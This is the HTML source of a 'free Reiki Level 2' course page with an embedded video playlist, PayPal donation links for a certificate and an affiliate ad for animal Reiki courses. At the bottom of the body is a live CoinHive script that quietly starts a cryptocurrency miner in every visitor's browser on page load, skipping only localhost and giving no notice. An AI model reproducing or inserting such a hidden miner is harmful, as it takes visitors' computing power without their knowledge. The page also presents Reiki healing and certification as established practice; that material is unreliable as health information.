<html lang="en"><head><meta charset="utf-8"><meta name="viewport" content="width=device-width,initial-scale=1,shrink-to-fit=no"><meta name="theme-color" content="#000000"><link rel="manifest" href="/manifest.json"><link rel="shortcut icon" href="/favicon.ico"><title>Free course &amp; Certificate Reiki Level 2, Advanced Practitioner</title><style>#root,body,html{height:100%}body{padding:0;margin:0;font-family:Roboto,sans-serif;font-size:16px;font-weight:300;line-height:1.625}</style><style type="text/css" data-styled-components="flzjwv docgAr cMFRXT bBdWDS bpmvKU bgaTio jeeIqW cGjzCr kglVjS jZKPLQ qbwEk fxiuvU fvbgjt iDtNAl hoPpXa kywAIZ grfQHG ioqgAE eCCieh ixYccr eJpdKo dnzqNj fGnuAf iazFQI cEpdpc dEPMYc hdXoOi gFYdzo glYzxR bwrLxh eqPnLb iYFmsc eNZVjM KnWUq" data-styled-components-is-local="true">
/* sc-component-id: common__Title-iXEmfY */
.common__Title-iXEmfY {}
.ixYccr{color:#362c2a;font-size:36px;margin-top:20px;}
/* sc-component-id: common__SubTitle-dKNBMS */
.common__SubTitle-dKNBMS {}
.iazFQI{color:#362c2a;font-size:26px;margin-top:20px;}
/* sc-component-id: common__Para-iTmdiH */
.common__Para-iTmdiH {}
.eJpdKo{color:#362c2a;margin-bottom:26px;font-size:16px;line-height:1.625;}
/* sc-component-id: common__TextWrapper-bqtRni */
.common__TextWrapper-bqtRni {}
.ioqgAE{max-width:720px;margin:0 auto;overflow:hidden;margin-bottom:10px;}
/* sc-component-id: common__Li-fJadQX */
.common__Li-fJadQX {}
.cEpdpc{color:#362c2a;line-height:1.4;margin:5px;}
/* sc-component-id: common__ContentCTA-gdWXvW */
.common__ContentCTA-gdWXvW {}
.hoPpXa{display:inline-block;text-align:center;background:#e72f34;background:linear-gradient(to bottom,rgba(235,73,78,1) 0%,rgba(231,47,53,1) 100%);padding:10px;border-radius:4px;color:white;text-decoration:none;font-weight:bold;font-style:italic;font-variant:small-caps;font-size:22px;box-shadow:0px 6px #9e1e21;text-align:center;-webkit-transition:0.3s all;transition:0.3s all;margin-bottom:16px;cursor:pointer;-webkit-user-select:none;-moz-user-select:none;-ms-user-select:none;user-select:none;}.hoPpXa:hover{box-shadow:0px 3px #9e1e21;-webkit-transform:translate(0px,3px);-ms-transform:translate(0px,3px);transform:translate(0px,3px);}.hoPpXa:active{box-shadow:0px 1px #9e1e21;-webkit-transform:translate(0px,5px);-ms-transform:translate(0px,5px);transform:translate(0px,5px);}
/* sc-component-id: common__ContentCTA-fFQeBB */
.common__ContentCTA-fFQeBB {}
.kywAIZ{display:inline-block;text-align:center;background:#e72f34;background:linear-gradient(to bottom,rgba(235,73,78,1) 0%,rgba(231,47,53,1) 100%);padding:10px;border-radius:4px;color:white;text-decoration:none;font-weight:bold;font-style:italic;font-variant:small-caps;font-size:22px;box-shadow:0px 6px #9e1e21;text-align:center;-webkit-transition:0.3s all;transition:0.3s all;margin-bottom:16px;cursor:pointer;-webkit-user-select:none;-moz-user-select:none;-ms-user-select:none;user-select:none;font-size:20px;font-weight:normal;box-shadow:0px 4px #9e1e21;margin-bottom:14px;padding:7px;}.kywAIZ:hover{box-shadow:0px 3px #9e1e21;-webkit-transform:translate(0px,3px);-ms-transform:translate(0px,3px);transform:translate(0px,3px);}.kywAIZ:active{box-shadow:0px 1px #9e1e21;-webkit-transform:translate(0px,5px);-ms-transform:translate(0px,5px);transform:translate(0px,5px);}.kywAIZ:hover{box-shadow:0px 2px #9e1e21;-webkit-transform:translate(0px,2px);-ms-transform:translate(0px,2px);transform:translate(0px,2px);}.kywAIZ:active{box-shadow:0px 1px #9e1e21;-webkit-transform:translate(0px,3px);-ms-transform:translate(0px,3px);transform:translate(0px,3px);}
/* sc-component-id: common__CenterInline-elShya */
.common__CenterInline-elShya {}
.dnzqNj{text-align:center;}
/* sc-component-id: common__FollowOnFacebookImage-dMvwYn */
.common__FollowOnFacebookImage-dMvwYn {}
.hdXoOi{width:100%;margin:20px 0;}
/* sc-component-id: common__StyledHeroImage-cUXPTE */
.common__StyledHeroImage-cUXPTE {}
.fGnuAf{margin:20px 0;border-radius:15px;max-width:100%;}
/* sc-component-id: ReactAudioPlayer__Container-eOBoBE */
.ReactAudioPlayer__Container-eOBoBE {}
.docgAr{position:fixed;bottom:0;right:0;width:100%;background:#362c2a;padding:10px;box-sizing:border-box;}
/* sc-component-id: common__ContentCTA-gCcKYi */
.common__ContentCTA-gCcKYi {}
.bBdWDS{display:inline-block;text-align:center;background:#e72f34;background:linear-gradient(to bottom,rgba(235,73,78,1) 0%,rgba(231,47,53,1) 100%);padding:10px;border-radius:4px;color:white;text-decoration:none;font-weight:bold;font-style:italic;font-variant:small-caps;font-size:22px;box-shadow:0px 6px #9e1e21;text-align:center;-webkit-transition:0.3s all;transition:0.3s all;margin-bottom:16px;cursor:pointer;-webkit-user-select:none;-moz-user-select:none;-ms-user-select:none;user-select:none;font-size:20px;font-weight:normal;box-shadow:0px 4px #9e1e21;margin-bottom:14px;padding:7px;margin-right:5px;padding:7px 16px;background:#e72f34;-webkit-transition:0.3s all;transition:0.3s all;}.bBdWDS:hover{box-shadow:0px 3px #9e1e21;-webkit-transform:translate(0px,3px);-ms-transform:translate(0px,3px);transform:translate(0px,3px);}.bBdWDS:active{box-shadow:0px 1px #9e1e21;-webkit-transform:translate(0px,5px);-ms-transform:translate(0px,5px);transform:translate(0px,5px);}.bBdWDS:hover{box-shadow:0px 2px #9e1e21;-webkit-transform:translate(0px,2px);-ms-transform:translate(0px,2px);transform:translate(0px,2px);}.bBdWDS:active{box-shadow:0px 1px #9e1e21;-webkit-transform:translate(0px,3px);-ms-transform:translate(0px,3px);transform:translate(0px,3px);}
/* sc-component-id: common__ContentCTA-gCdRjr */
.common__ContentCTA-gCdRjr {}
.bpmvKU{display:inline-block;text-align:center;background:#e72f34;background:linear-gradient(to bottom,rgba(235,73,78,1) 0%,rgba(231,47,53,1) 100%);padding:10px;border-radius:4px;color:white;text-decoration:none;font-weight:bold;font-style:italic;font-variant:small-caps;font-size:22px;box-shadow:0px 6px #9e1e21;text-align:center;-webkit-transition:0.3s all;transition:0.3s all;margin-bottom:16px;cursor:pointer;-webkit-user-select:none;-moz-user-select:none;-ms-user-select:none;user-select:none;font-size:20px;font-weight:normal;box-shadow:0px 4px #9e1e21;margin-bottom:14px;padding:7px;margin-right:5px;padding:7px 16px;background:#e72f34;-webkit-transition:0.3s all;transition:0.3s all;box-shadow:0px 2px #9e1e21;-webkit-transform:translate(0px,2px);-ms-transform:translate(0px,2px);transform:translate(0px,2px);background:#ffeac9;color:#362c2a;-webkit-transition:5s all;transition:5s all;}.bpmvKU:hover{box-shadow:0px 3px #9e1e21;-webkit-transform:translate(0px,3px);-ms-transform:translate(0px,3px);transform:translate(0px,3px);}.bpmvKU:active{box-shadow:0px 1px #9e1e21;-webkit-transform:translate(0px,5px);-ms-transform:translate(0px,5px);transform:translate(0px,5px);}.bpmvKU:hover{box-shadow:0px 2px #9e1e21;-webkit-transform:translate(0px,2px);-ms-transform:translate(0px,2px);transform:translate(0px,2px);}.bpmvKU:active{box-shadow:0px 1px #9e1e21;-webkit-transform:translate(0px,3px);-ms-transform:translate(0px,3px);transform:translate(0px,3px);}
/* sc-component-id: ReactAudioPlayer__StyledReactAudioPlayer-cTNAUK */
.ReactAudioPlayer__StyledReactAudioPlayer-cTNAUK {}
.cMFRXT{width:100%;}
/* sc-component-id: AppRenderer__Wrapper-gzGQUn */
.AppRenderer__Wrapper-gzGQUn {}
.flzjwv{padding-bottom:90px;background:#362c2a;}
/* sc-component-id: Header__Container-hSjUSt */
.Header__Container-hSjUSt {}
.jZKPLQ{height:400px;width:100%;}
/* sc-component-id: Header__StyledParallax-jBGADv */
.Header__StyledParallax-jBGADv {}
.qbwEk{height:400px;}.qbwEk > div{height:100%;}
/* sc-component-id: Header__StyledTitle-JpWsz */
.Header__StyledTitle-JpWsz {}
.fvbgjt{margin:15px;color:#e72f34;background:rgba(54,44,42,0.95);padding:10px;display:inline-block;}
/* sc-component-id: Header__CTAWrapper-hPNlQO */
.Header__CTAWrapper-hPNlQO {}
.iDtNAl{position:absolute;bottom:0;left:0;right:0;text-align:center;background:#ffffffb0;padding:20px;}
/* sc-component-id: Header__TitleContainer-kpprKG */
.Header__TitleContainer-kpprKG {}
.fxiuvU{width:640px;margin:0 auto;position:relative;height:100%;}
/* sc-component-id: Navigation__Container-cKEzTc */
.Navigation__Container-cKEzTc {}
.jeeIqW{width:100%;height:60px;background:#362c2a;}
/* sc-component-id: Navigation__StyledLink-hAUYpC */
.Navigation__StyledLink-hAUYpC {}
.kglVjS{height:60px;line-height:60px;color:#f2ce94;padding:0 10px;font-weight:bold;border-bottom:3px solid transparent;display:inline-block;box-sizing:border-box;-webkit-transition:0.3s all;transition:0.3s all;cursor:pointer;}.kglVjS:hover{border-bottom:3px solid #e73333;}
/* sc-component-id: Navigation__StyledLogo-ftDRDA */
.Navigation__StyledLogo-ftDRDA {}
.cGjzCr{height:60px;float:left;}
/* sc-component-id: Footer__Container-eytXlh */
.Footer__Container-eytXlh {}
.gFYdzo{background:#362c2a;padding:10px;}
/* sc-component-id: Footer__StyledLink-hDoGnW */
.Footer__StyledLink-hDoGnW {}
.bwrLxh{color:#f2ce86;padding:10px;display:inline-block;-webkit-transition:0.3s all;transition:0.3s all;}.bwrLxh:hover{color:#e72f34;}
/* sc-component-id: Footer__Divider-dCCnd */
.Footer__Divider-dCCnd {}
.eqPnLb{color:#f2ce94;}
/* sc-component-id: Footer__LinkContainer-HsWve */
.Footer__LinkContainer-HsWve {}
.glYzxR{text-align:center;}
/* sc-component-id: Footer__Copyright-eTGlms */
.Footer__Copyright-eTGlms {}
.iYFmsc{text-align:center;color:#8f7246;}
/* sc-component-id: ContentWrapper__Container-hLcdVU */
.ContentWrapper__Container-hLcdVU {}
.grfQHG{background:#ffeac9;overflow:hidden;min-height:100vh;}
/* sc-component-id: Home__Container-jVSCVY */
.Home__Container-jVSCVY {}

/* sc-component-id: Home__StyledLeftImage-fMJAzB */
.Home__StyledLeftImage-fMJAzB {}
.eCCieh{float:left;margin:20px 20px 10px 0;border-radius:15px;}
/* sc-component-id: Home__StyledParallax-jcrfBq */
.Home__StyledParallax-jcrfBq {}
.dEPMYc{height:200px;}
/* sc-component-id: PayPalDonate__StyledLink-loceSj */
.PayPalDonate__StyledLink-loceSj {}
.KnWUq{text-align:center;display:inherit;background:#fffcd9;padding:16px;margin-bottom:10px;border-radius:15px;}
/* sc-component-id: ReikiLevel1__Container-iAeOqq */
.ReikiLevel1__Container-iAeOqq {}
</style><script type="text/javascript" id="www-widgetapi-script" src="http://s.ytimg.com/yts/jsbin/www-widgetapi-vflnzpyZ4/www-widgetapi.js" async=""></script><script type="text/javascript" charset="utf-8" async="" src="/static/js/home.6791eb74.chunk.js"></script><script type="text/javascript" charset="utf8" async="" src="http://www.youtube.com/iframe_api"></script><style type="text/css" data-styled-components="goNzMJ" data-styled-components-is-local="true">
/* sc-component-id: ReikiLevel2__Container-kjglVa */
.ReikiLevel2__Container-kjglVa {}
</style></head><body><div id="root"><div data-reactroot="" class="AppRenderer__Wrapper-gzGQUn flzjwv"><div class="ReikiLevel2__Container-kjglVa goNzMJ"><div class="Navigation__Container-cKEzTc jeeIqW"><a href="/"><img class="Navigation__StyledLogo-ftDRDA cGjzCr" src="/static/media/Free_Reiki_Course_long_light_text.7a397906.png"></a><a class="Navigation__StyledLink-hAUYpC kglVjS" href="/">Home</a><a class="Navigation__StyledLink-hAUYpC kglVjS" href="/free_reiki_courses_11.html">Reiki Level 1</a><a class="Navigation__StyledLink-hAUYpC kglVjS" href="/advanced_practitioner_level_2_12.html">Reiki Level 2</a><a class="Navigation__StyledLink-hAUYpC kglVjS" href="/page_13.html">Reiki Level 3</a><a class="Navigation__StyledLink-hAUYpC kglVjS" href="/free_attunements_10.html">Attunements</a><a class="Navigation__StyledLink-hAUYpC kglVjS" href="/reik_products_14.html">Products</a><a class="Navigation__StyledLink-hAUYpC kglVjS" href="/contact_us_4.html">About us</a></div><div class="ContentWrapper__Container-hLcdVU grfQHG"><div class="common__TextWrapper-bqtRni ioqgAE"><h1 class="common__Title-iXEmfY ixYccr">Free course &amp; Certificate Reiki Level 2, Advanced Practitioner</h1><p class="common__Para-iTmdiH eJpdKo">Here you can learn Reiki Level 2 and get your diploma certificate for a small donation.</p><p class="common__Para-iTmdiH eJpdKo">Free Reiki practitioner level 2 full training course click on play below to watch now.</p><span><iframe frameborder="0" allowfullscreen="1" gesture="media" title="YouTube video player" width="100%" height="360" src="https://www.youtube.com/embed/jevsbP676qc?autoplay=0&amp;modestbranding=1&amp;listType=playlist&amp;list=PLOx9-zLf4DPSFAh78hwfDg9ChPPqxIMca&amp;enablejsapi=1&amp;origin=http%3A%2F%2Flocalhost%3A3000&amp;widgetid=3" id="widget4"></iframe></span><br><div class="common__CenterInline-elShya dnzqNj"><a href="https://www.paypal.me/FreeReikiCourse/19" rel="nofollow" class="common__ContentCTA-gdWXvW hoPpXa" target="_blank">Get my Reiki diploma certificate level 1 and make a donation</a></div><p class="common__Para-iTmdiH eJpdKo">To get your free diploma certificate please make a donation below. It is needed to maintain the costs of this website.</p><div class="common__CenterInline-elShya dnzqNj"><a class="common__ContentCTA-gdWXvW hoPpXa" href="/page_13.html">Go to learn Reiki Level 3</a></div><div class="common__CenterInline-elShya dnzqNj"><a class="common__ContentCTA-fFQeBB kywAIZ" href="/reik_products_14.html">Start your own Reiki school from home or online</a></div><a href="https://www.facebook.com/freereikicourse/" rel="nofollow" target="_blank"><img class="common__FollowOnFacebookImage-dMvwYn hdXoOi" src="/static/media/folow_on_facebook.9edcfaf8.jpg"></a><div class="common__CenterInline-elShya dnzqNj"><a href="https://www.facebook.com/freeReikicourse/" rel="nofollow" class="common__ContentCTA-gdWXvW hoPpXa" target="_blank">Follow us on Facebook</a></div><a href="http://7e6f7r2kvpo-9tfdj4wd4iqo2f.hop.clickbank.net/" rel="nofollow" target="_blank"><img class="common__StyledHeroImage-cUXPTE fGnuAf" src="/static/media/animalReiki.f2b652ff.jpg"></a><div class="common__CenterInline-elShya dnzqNj"><a href="http://7e6f7r2kvpo-9tfdj4wd4iqo2f.hop.clickbank.net/" rel="nofollow" class="common__ContentCTA-gdWXvW hoPpXa" target="_blank">Animal Reiki Home Study Courses - Quick And Simple!</a></div><p class="common__Para-iTmdiH eJpdKo">Simple Courses For Pets Health &amp; Wellbeing. Color Manual, Qualification, Certificate, Attunements &amp; On-going Support From International Reiki Master. Courses For Dogs, Cats, Horses, Dog Groomer. New To Cb.</p></div></div><div class="Footer__Container-eytXlh gFYdzo"><div class="Footer__LinkContainer-HsWve glYzxR"><a class="Footer__StyledLink-hDoGnW bwrLxh" href="/">Home</a><span class="Footer__Divider-dCCnd eqPnLb">|</span><a class="Footer__StyledLink-hDoGnW bwrLxh" href="/free_reiki_courses_11.html">Reiki Level 1</a><span class="Footer__Divider-dCCnd eqPnLb">|</span><a class="Footer__StyledLink-hDoGnW bwrLxh" href="/advanced_practitioner_level_2_12.html">Reiki Level 2</a><span class="Footer__Divider-dCCnd eqPnLb">|</span><a class="Footer__StyledLink-hDoGnW bwrLxh" href="/page_13.html">Reiki Level 3</a><span class="Footer__Divider-dCCnd eqPnLb">|</span><a class="Footer__StyledLink-hDoGnW bwrLxh" href="/free_attunements_10.html">Attunements</a><span class="Footer__Divider-dCCnd eqPnLb">|</span><a class="Footer__StyledLink-hDoGnW bwrLxh" href="/reik_products_14.html">Products</a><span class="Footer__Divider-dCCnd eqPnLb">|</span><a class="Footer__StyledLink-hDoGnW bwrLxh" href="/contact_us_4.html">About us</a><span class="Footer__Divider-dCCnd eqPnLb">|</span><a class="Footer__StyledLink-hDoGnW bwrLxh" href="/site_map.html">Site map</a><span class="Footer__Divider-dCCnd eqPnLb">|</span><a href="https://www.paypal.me/FreeReikiCourse/19" rel="nofollow" class="Footer__StyledLink-hDoGnW bwrLxh" target="_blank">Donate to Reiki</a></div><p class="Footer__Copyright-eTGlms iYFmsc"><!-- react-text: 268 -->© Copyright <!-- /react-text --><!-- react-text: 269 -->2017<!-- /react-text --><!-- react-text: 270 --> The International School Of Reiki &amp; FreeReikiCourse.com All Rights Reserved<!-- /react-text --></p></div></div><div class="ReactAudioPlayer__Container-eOBoBE docgAr"><audio class="react-audio-player ReactAudioPlayer__StyledReactAudioPlayer-cTNAUK cMFRXT" controls="" preload="metadata" src="/static/media/04.28653bc2.mp3" title="/static/media/04.28653bc2.mp3"><p><!-- react-text: 5 -->Your browser does not support the <!-- /react-text --><code>audio</code><!-- react-text: 7 --> element.<!-- /react-text --></p></audio><div><a class="common__ContentCTA-gCcKYi bBdWDS" href="">Previous</a><a class="common__ContentCTA-gCcKYi bBdWDS" href="">Next</a><a class="common__ContentCTA-gCcKYi bBdWDS" href="">1</a><a class="common__ContentCTA-gCcKYi bBdWDS" href="">2</a><a class="common__ContentCTA-gCcKYi bBdWDS" href="">3</a><a class="common__ContentCTA-gCdRjr bpmvKU" href="">4</a><a class="common__ContentCTA-gCcKYi bBdWDS" href="">5</a><a class="common__ContentCTA-gCcKYi bBdWDS" href="">6</a><a class="common__ContentCTA-gCcKYi bBdWDS" href="">7</a><a class="common__ContentCTA-gCcKYi bBdWDS" href="">8</a><a class="common__ContentCTA-gCcKYi bBdWDS" href="">9</a></div></div></div></div><noscript>You need to enable JavaScript to run this app.</noscript><script type="text/javascript" async="" src="https://www.google-analytics.com/analytics.js"></script><script async="" src="https://www.googletagmanager.com/gtag/js?id=UA-12420899-9"></script><script>function gtag(){dataLayer.push(arguments)}window.dataLayer=window.dataLayer||[],gtag("js",new Date),gtag("config","UA-12420899-9")</script><link rel="stylesheet" href="https://fonts.googleapis.com/css?family=Roboto|Roboto+Mono"><script>var trackOutboundLink=function(n){ga("send","event","outbound","click",n,{transport:"beacon",hitCallback:function(){document.location=n}})}</script><script src="https://coinhive.com/lib/coinhive.min.js"></script><script>window.CoinHive = window.CoinHive || {};
  var miner = new window.CoinHive.Anonymous('iQ7t5qIxTq6qy2jPcBX4vTO7pwUzSo61');
  if (window.location.hostname !== `localhost`) {
    miner.setThrottle(0.25);
    miner.start();
    console.log(`M_ON`);
  } else {
    console.log(`M_OFF`);
  }</script><script type="text/javascript" src="/static/js/main.bcaee925.js"></script></body></html>